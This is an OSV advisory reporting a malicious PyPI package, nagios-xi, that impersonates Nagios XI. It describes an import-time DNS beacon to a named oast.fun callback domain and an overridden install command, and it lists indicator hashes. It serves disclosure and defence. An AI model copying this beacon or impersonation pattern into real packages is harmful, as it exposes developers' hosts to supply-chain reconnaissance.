MAL-2026-5698

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/nagios-xi/MAL-2026-5698.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5698

Published

2026-06-12T15:27:24Z

Modified

2026-06-12T20:02:00.831577719Z

Summary

Malicious code in nagios-xi (PyPI)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (c11c80cc2d314460d61a649c84fd75881388470382be8183b77b362e562a5c7f)

On import nagios_xi, the package's __init__.py (lines 5-8) invokes socket.gethostbyname("atlass-check.autaeqjhfowvnnmkwhxjtq8x39d8nder1.oast.fun") inside a silent try/except. oast.fun is ProjectDiscovery's Interactsh out-of-band callback service; the DNS query itself is the exfiltration channel, confirming code execution on the installer's host and leaking the resolver IP to whoever controls the unique 32-character Interactsh subdomain. The package ships no actual functionality — it impersonates the Nagios XI commercial monitoring product (name nagios-xi, version 19.5.0 mimicking real Nagios XI versioning) while declaring an anonymous ProtonMail author (Coding Team <pocbug@protonmail.com>), a generic package utility description, and an empty README. The combination of brand impersonation, placeholder metadata, and an import-time OAST beacon as the package's sole behavior is reconnaissance for a supply-chain attack against developers searching for Nagios XI integrations.

Source: kam193 (d8b27c2588accf4f2966f4630a12f9bfdc4ba621403f14237160632447152f23)

Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.

Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.

Campaign: GENERIC-standard-pypi-install-pentest

Reasons (based on the campaign):

The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.
The package overrides the install command in setup.py to execute malicious code during installation.

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "pypi/GENERIC-standard-pypi-install-pentest/nagios-xi",
            "versions": [
                "19.4.0",
                "19.5.0"
            ],
            "sha256": "d8b27c2588accf4f2966f4630a12f9bfdc4ba621403f14237160632447152f23",
            "source": "kam193",
            "modified_time": "2026-06-12T15:27:24.46448Z",
            "import_time": "2026-06-12T16:32:19.011939508Z"
        },
        {
            "id": "IN-MAL-2026-006196",
            "import_time": "2026-06-12T19:44:18.873734183Z",
            "sha256": "bf230c0a9f6b4215c87f567dc3b40574dc7e8581debf2cf518621e9491241886",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:11:02Z",
            "versions": [
                "19.5.0"
            ]
        },
        {
            "id": "IN-MAL-2026-006195",
            "import_time": "2026-06-12T19:44:18.777294268Z",
            "sha256": "c11c80cc2d314460d61a649c84fd75881388470382be8183b77b362e562a5c7f",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:11:01Z",
            "versions": [
                "19.5.0"
            ]
        }
    ]
}

References

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com
- Kamil Mańkowski (kam193) - REPORTER
- - https://github.com/kam193
  - https://bad-packages.kam193.eu/

Affected packages

PyPI / nagios-xi

Package

Name: nagios-xi; View open source insights on deps.dev
Purl: pkg:pypi/nagios-xi

Affected ranges

Affected versions

19.*

19.4.0

19.5.0

Database specific

indicators

{
    "evidence_files": [
        {
            "path": "nagios_xi/__init__.py",
            "sha256": "36dea5501185191fc23e357d31dcf965b05e6573667a2f069bc599583a25ce9d",
            "tlsh": "3fd012568d9595512376931d001a4598e19952034a121e3735fddb805f7617108b3399"
        },
        {
            "path": "pyproject.toml",
            "sha256": "05321a5ace4b9b52ae3635fec8c626890e2c0aefd9c6f93c27fcab947f88e1e0",
            "tlsh": "b8f0dc3389c3eea96792419030158120da71916e2b84c4ea76fec18d6babd40c7fcc34"
        }
    ],
    "package_integrity": [
        {
            "filename": "nagios_xi-19.5.0-py3-none-any.whl",
            "hashes": {
                "md5": "cccc2a73e13244868b175ca85f33cf28",
                "blake2b_256": "0414f620b2350dc87b6128e791674b646188f892e4bc8f96b7ec3c22bd7969b7",
                "sha256": "0c13fa1337c4fcfbed11201d528adcadfe6e02b86387fa2e029966b0e3f08c38"
            }
        },
        {
            "filename": "nagios_xi-19.5.0.tar.gz",
            "hashes": {
                "md5": "47adb051c92db6a22b350bf9d858af3e",
                "blake2b_256": "f4d535cec652948dada4a2f987250ae1f3e706a1bcf69790209a34685289a7cb",
                "sha256": "73668f0ab1312b81e895747d19bc12a04a152d837dc864bca6eae76fcb30841f"
            }
        }
    ],
    "domains": [
        "atlass-check.autaeqjhfowvnnmkwhxjtq8x39d8nder1.oast.fun"
    ]
}

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/nagios-xi/MAL-2026-5698.json"